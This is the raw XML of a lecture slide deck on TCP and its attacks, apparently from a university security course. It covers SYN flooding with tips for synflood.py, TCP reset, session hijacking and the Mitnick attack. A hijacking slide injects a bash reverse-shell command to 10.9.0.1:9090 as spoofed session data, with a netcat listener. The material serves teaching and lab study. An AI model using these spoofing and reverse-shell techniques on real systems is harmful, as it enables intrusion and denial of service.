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5" r:id="rId3"/>
    <p:sldId id="285" r:id="rId4"/>
    <p:sldId id="286" r:id="rId5"/>
    <p:sldId id="300" r:id="rId6"/>
    <p:sldId id="266" r:id="rId7"/>
    <p:sldId id="267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301" r:id="rId23"/>
    <p:sldId id="287" r:id="rId24"/>
    <p:sldId id="302" r:id="rId25"/>
    <p:sldId id="303" r:id="rId26"/>
    <p:sldId id="304" r:id="rId27"/>
    <p:sldId id="307" r:id="rId28"/>
    <p:sldId id="305" r:id="rId29"/>
    <p:sldId id="314" r:id="rId30"/>
    <p:sldId id="288" r:id="rId31"/>
    <p:sldId id="290" r:id="rId32"/>
    <p:sldId id="291" r:id="rId33"/>
    <p:sldId id="308" r:id="rId34"/>
    <p:sldId id="309" r:id="rId35"/>
    <p:sldId id="293" r:id="rId36"/>
    <p:sldId id="313" r:id="rId37"/>
    <p:sldId id="310" r:id="rId38"/>
    <p:sldId id="311" r:id="rId39"/>
    <p:sldId id="312" r:id="rId40"/>
    <p:sldId id="294" r:id="rId41"/>
    <p:sldId id="295" r:id="rId42"/>
    <p:sldId id="296" r:id="rId43"/>
    <p:sldId id="315" r:id="rId44"/>
    <p:sldId id="316" r:id="rId45"/>
    <p:sldId id="320" r:id="rId46"/>
    <p:sldId id="317" r:id="rId47"/>
    <p:sldId id="318" r:id="rId48"/>
    <p:sldId id="319" r:id="rId49"/>
    <p:sldId id="298" r:id="rId50"/>
    <p:sldId id="29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775" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="77" d="100"/>
          <a:sy n="77" d="100"/>
        </p:scale>
        <p:origin x="18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0E91-F366-4DC1-B7B7-7C1E8DAC99BF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EEA-212A-445A-B5B9-3AEB50B9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9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Improve the success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</a:rPr>
              <a:t>Simultaneously run multiple instances of synflood.py (6 times work quite well for me)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</a:rPr>
              <a:t>Reduce the queue size (to 80): for experiment purpose, not for real attack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07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civilized method and a non-civilized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191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step is not necessary in the real attack, but if we do not reset the connection, when we rerun the attack, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>we will have to change some of the TCP parameters, because the parameters used in the program already belong to an existing connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we don’t change the parameter, we will have to wait for quite a long time before the OS deletes the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>connection.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2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Randomizing source port and sequence number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypting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9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3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m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8915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TCP Protocols and Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52881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2BB7-0389-4785-AB48-6FE1B1EA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Header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AE1E5-5841-8387-DA38-DF9BE6D47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95" y="1524000"/>
            <a:ext cx="7365305" cy="3317917"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237924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2AC2-F8D2-9C5A-10C5-1BBD1788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flooding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41EE0-E613-6D53-56F0-56B0032BE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9FDE-EFD0-885B-A262-5D662604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Establishing Connections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E017A47-ABF6-4D1B-210D-C1C99B067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8406384" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="192733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B996-FF66-D657-97E0-F0D20284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 Flooding Attack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A337B5-B1ED-A358-1CEA-CE6E2AEFE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44" y="1676400"/>
            <a:ext cx="6839232" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="313767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466A-8D19-080F-C84E-EB80ABB2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the Attack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704AA-1B0F-8F04-FA44-815A72317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827" y="1766655"/>
            <a:ext cx="8354591" cy="3324689"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8726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8795-B4F1-17BF-10D7-82D4424D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In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D7635-2489-7829-E5AC-D1A0AD031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644" y="1828800"/>
            <a:ext cx="8364117" cy="29150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35263-B4ED-A234-B2E4-B661A2A2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68" y="5155019"/>
            <a:ext cx="8364117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56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BE3A-6B1F-3D46-55CF-5369224A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Launching SYN Flooding Attacks Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Scapy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9E7AA-5BBE-97F8-B126-522546579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8373644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C6F1-139A-4FC7-FCC1-F4B5674F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SYN Flooding Attack Fail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49A-0267-8731-FC32-EBC92D30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VirtualBox (if we use VMs, instead of containers)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098D619-2D26-B9DE-2CAB-6E19AC61D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76" b="13523"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066799" y="2209800"/>
            <a:ext cx="558641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6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7EEF-2135-4385-A62A-14058E6A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SYN Flooding Attack Fail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82F3-71FD-98CF-DDE0-E81EFAA9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retransmission (On Server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> net.ipv4.tcp_synack_retries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	net.ipv4.tcp_synack_retries = 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size of the SYN queue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> net.ipv4.tcp_max_syn_backlog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	net.ipv4.tcp_max_syn_backlog = 512</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2313669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178A-B50A-C53C-114B-E4ACFE7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SYN Flooding Attack Fail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9892-9C6D-D2F5-6111-4C5067879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cache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	# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>tcp_metrics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> show</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>	10.0.2.68 age 140.552sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>cwnd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>rtt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> 79us ... source 10.0.2.69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dirty="0"/>
              <a:t>	# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>tcp_metrics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> flush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7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304800"/>
            <a:ext cx="9549245" cy="9144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10972800" cy="4038600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How TCP works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SYN Flooding Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TCP Reset Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TCP Session Hijacking Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mitnick Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="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15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612F-0744-4CE2-8CAC-7833AA91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SYN Cookie Countermeasure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0B4318-7571-0AAB-4A8A-A71E726A3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6793511" cy="3657599"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="341024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5E0A-36DC-B785-D5EA-46FE73A6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Reset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0AE74-B640-3FD7-0E3A-BA362908B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9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C38B-A47A-64E9-6488-053BECE4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Finish a Phone Call?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3DA7-0A95-A620-92FA-45027D29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students to answer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30331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5962-D1CA-6684-2A2D-DA469EE8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Close TCP Connections?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87AB933-1A61-04CF-8ACD-6480E919C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4869707" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="643804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084B-659A-DB3E-3C28-E7C2921A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Reset Packet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4FFE8-FF4E-B4FC-F748-297F2F607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638"/>
            <a:ext cx="5963482" cy="2686425"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1251068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CD02-23F1-DBE6-B218-66898705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Reset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3EE0-5BD3-321C-070E-971C3C2A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43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CA44-ABDC-F9A4-986A-03B0F597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Spoofing Reset Packet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7FA53-836C-43FC-6724-E2AC4AA88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621"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2895600"/>
            <a:ext cx="5967630" cy="32305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7FEE7A-419F-61DB-1308-FCF0E8F45BBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="1859340"/>
            <a:ext cx="3504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Target connection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>A ---------------- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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7507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2AC1-758F-C9FB-8B68-6D2DE07D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Reset Packet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder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FDA7E55D-F3C7-2F9C-DB3B-3A896E71A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5" y="2904061"/>
            <a:ext cx="6319751" cy="3420539"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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D5C3AFD-2BA1-023C-033A-40FA2A666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5820427" cy="168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01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DF0E-4A1E-7216-C534-3023A803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Rest Attack: Sample Code</a:t>
            </a:r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BE65A228-436C-0B17-86A3-5511950B5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4172"/>
            <a:ext cx="8735644" cy="4515480"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322794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93131" algn="l">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>TCP Reset Attack on Video Streaming</a:t>
            </a:r>
            <a:endParaRPr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5392616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3E1-324B-0ADF-1D50-097D3660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tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> client/server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81921-FAAB-4840-7370-4C6EC6FEF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8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9DA3-6B75-3143-E3DE-F48507B7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Session Hijacking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9186F-6780-546A-4B34-F9FF1A5E0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08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D79C-66D8-BC44-BE37-BD936226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Session Hijacking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5B0283C-A411-21C7-5E1F-4C3E89C6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81200"/>
            <a:ext cx="8783276" cy="2467319"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3901035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6239-E9F9-57C4-6949-26EDF27A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Sequence Number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408CC-D45E-DFC5-F4D3-FEEE99955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00200"/>
            <a:ext cx="8164064" cy="24101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8B3A68-490E-AEAE-2FE0-78DE0AEAF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52" y="4186088"/>
            <a:ext cx="815453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34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34DD-4219-377F-257A-B72C243A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Sequence Number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Diagram, timeline&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5353F3D1-23BF-C59B-D9F9-951D4ECF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10439400" cy="2504045"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1602604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0041-A4C5-0A8F-29D0-BDDB64F0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Hijacking: Manual Spoofing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5E7071A-3774-8FD5-69FB-E774C206F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47576"/>
            <a:ext cx="8211696" cy="3562847"/>
          </a:xfr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78250BB4-3C2C-90F2-E0F4-C60E9039F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259230"/>
            <a:ext cx="6687292" cy="12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2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47DC-2FE6-10C5-76F0-345D3196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Hijacking: Automatic Spoofing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BE48CF9C-2486-E47A-1180-D007BDB99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8364117" cy="4486901"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="819597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73A1-029E-F605-D584-31EB80FC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Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder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27E2E3AB-2265-CF87-4EAC-43CB4C94D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1757"/>
            <a:ext cx="9829800" cy="3194485"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3616541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DDC6-838B-F7EF-44EB-3F463716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D69E5-F725-4F81-A5DD-A90E2D40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/bin/bash -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&gt; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;/&lt;port&gt; 0&lt;&amp;1 2&gt;&amp;1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32BD208-0B52-ED9F-423D-32F7FAD3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4" y="4773425"/>
            <a:ext cx="9764488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17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5D6B-3E84-FFB1-BD4A-6E5D9604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7B10-FE26-3BBC-F68F-116011A6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data = "\n/bin/bash -i &gt;/dev/tcp/10.9.0.1/9090 0&lt;&amp;1 2&gt;&amp;1\n"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37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4C9D-581A-62E7-40FB-F9E995DC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to The Session?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8A5D130-9DCF-21C6-8BBF-E54C028EC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8547084" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417250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E6E4-5A18-668C-524B-1C49E3F1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Program (Python)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735B1A3-8D42-CC91-DC74-713C33D78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47682"/>
            <a:ext cx="7468642" cy="2762636"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7313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8D01-944A-2584-D512-F27FDF8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Mitnick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16D0-5F85-634F-EA7F-6D836A1D2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46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46ED-3576-F33F-542F-1C2FCA31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(1994 and 1995)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821480-B1F7-930F-3A3F-719FDE9D3A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3714606"/>
          <a:ext cx="10972800" cy="297150"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2633877">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="765663018"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3604595">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2250198809"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4734328">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2003300699"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="29715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</a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="40155" marR="40155" marT="40155" marB="401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</a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="40155" marR="40155" marT="40155" marB="401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40155" marR="40155" marT="40155" marB="401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203817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23AC353B-A267-E625-A8B5-7A9A2E95F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2825"/>
            <a:ext cx="2759390" cy="386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279E02-1B1D-91D6-CB00-CE4D7F8CB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89" y="1676400"/>
            <a:ext cx="3467923" cy="37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15EC5DB8-57FD-2567-973E-78DFB7365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5" r="28205"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7143232" y="1752600"/>
            <a:ext cx="3672185" cy="371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AF90E4-1B22-4501-DA3A-43258BF8DEAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="5603955"/>
            <a:ext cx="205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Kevin Mitnick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60B89-DD3C-E10A-BDA8-67990550D789}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="5603955"/>
            <a:ext cx="306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Tsutomu Shimomura</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4090802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23F5-8304-091D-F8BA-31B94310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Mitnick Attack: Technical Details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5EF6CDFB-8D4A-22AE-FE25-27FD851B6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11" y="1734347"/>
            <a:ext cx="1859676" cy="229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1BAFC31-329D-CE32-F274-D3195B1A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56" y="1734347"/>
            <a:ext cx="1478290" cy="208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6F7AF205-34AC-C141-5ADF-06BF8611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44" y="4724400"/>
            <a:ext cx="2625911" cy="178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054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4591-7B56-9F0C-8DDC-642AA8CD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Simplified Mitnick Attack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BA4719E-3367-24F4-5943-BF61E0FEB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00600"/>
            <a:ext cx="2289987" cy="155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37EBFFC5-F93D-5F34-67CF-992E7C660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95552"/>
            <a:ext cx="1667214" cy="141222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A240355-5211-797B-5BAC-0F1BE4C9B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31" y="2188889"/>
            <a:ext cx="1099141" cy="1418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BD2BAC-D61F-56B4-F6F4-55F02EB17C88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1290361" y="3670395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10.9.0.5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C10A3-7BA1-7414-E1F3-2118E04FA1B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8096056" y="3717895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10.9.0.6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52B1F-6C50-6AB2-682F-A8CFC07421A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1672332"/>
            <a:ext cx="411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server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lnv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 9090 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="545901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2DB4-C064-6FAF-DFA0-FC2DADD3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Spoofing SYN Packet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7920180F-E341-ACBC-B728-DB98061C3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6906589" cy="3477110"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="441365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9D03-221F-8407-EF9B-EBA565FC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Shutdown the Client: Emulation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56972EE9-B72F-2590-6626-A67053D6B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844985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63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344E-93EA-222B-E7C3-6CEC0645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Spoofing ACK and Data (1)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87D1029-6539-A0E6-977C-B72A6553C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9993120" cy="3953427"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1347500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ECA2-2579-2204-741E-38155524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Spoofing ACK and Data (2)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3A1154-32A1-89A9-0D03-B57FD2350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10069330" cy="4182059"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="385870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11C9-1631-EB39-616D-6FC95107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5F4CD7-616A-E150-74A6-4D881EC01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30164"/>
            <a:ext cx="10038667" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3264708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6DF2-CC14-7348-7D5B-A72B6EFF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B01A6-6C37-42F6-7CE1-F3F383E30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BD76-1BD1-D63B-88E7-D37A87D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Program (Python)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3E6426D-ACFB-1789-F659-60CB7AC3E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6587886" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2517649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5472-FF29-C798-147D-692C29D2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8C26621-0AC0-1739-B342-23CA138B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845765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0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7926-4002-5812-367A-4515A694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TCP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491EA-473C-17B7-DA86-7B3798D56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96DB-B8C3-DC8F-4688-0A0311FD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Connections, Send/Receive Buffers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97DBF34-577C-2037-1469-FC99C0D9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8357311" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421100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04BD-9D63-E019-A5C7-0252995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Maintaining Order &amp;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7C31-8A02-F59D-1C42-A0179D03A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and Acknowledgment </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="338533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04FA-6FC1-FA5E-2D0A-F0D41D43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Speed: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0963-CD42-1BCC-3C6B-FEF87353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and Sliding Window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3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538</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>99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Consolas</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>TCP Protocols and Attacks</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>tcp client/server programs</vt:lpstr>
      <vt:lpstr>TCP Client Program (Python)</vt:lpstr>
      <vt:lpstr>TCP Server Program (Python)</vt:lpstr>
      <vt:lpstr>how TCP works</vt:lpstr>
